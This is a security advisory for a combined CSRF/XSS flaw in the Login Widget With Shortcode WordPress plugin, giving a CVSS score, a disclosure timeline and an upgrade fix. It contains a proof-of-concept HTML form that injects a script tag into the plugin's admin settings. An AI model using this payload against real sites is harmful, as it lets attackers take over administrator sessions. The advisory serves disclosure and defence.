CSRF/XSS vulnerablity in Login Widget With Shortcode allows unauthenticated attackers to do anything an admin can do


Last revised:

This plugin is vulnerable to a combination CSRF/XSS attack. An attacker able to convince an admin to visit a link of their choosing is able to insert arbitrary HTML into an admin page.  Using that ability they can use JavaScript to control an admin user’s browser, allowing the attacker to create user accounts, create posts, delete all posts, etc.

Current state: Fixed

CVSS Summary

CVSS base scores for this vulnerability
Score 6.8 Medium
Vector Network
Complexity Medium
Authentication None
Confidentiality Partial
Integrity Partial
Availability Partial
You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

If a logged-in administrator user clicks the submit button on this form, a javascript alert will display in the admin screens. (In a real attack the form can be made to auto-submit using Javascript).

<form method="POST" action="http://localhost/wp-admin/options-general.php?page=login_widget_afo">
  <input type="text" name="custom_style_afo" value="&lt;/textarea>&lt;script>alert(1)&lt;/script>">
  <input type="text" name="option" value="login_widget_afo_save_settings">
  <input type="submit">

Advisory timeline

  • 2014-08-26: Discovered
  • 2014-09-15: Reported to vendor by email
  • 2014-09-15: Vendor reported the issue fixed and a new version released
  • 2014-09-17: Published

Mitigation/further actions

Upgrade to version 3.2.1 or later.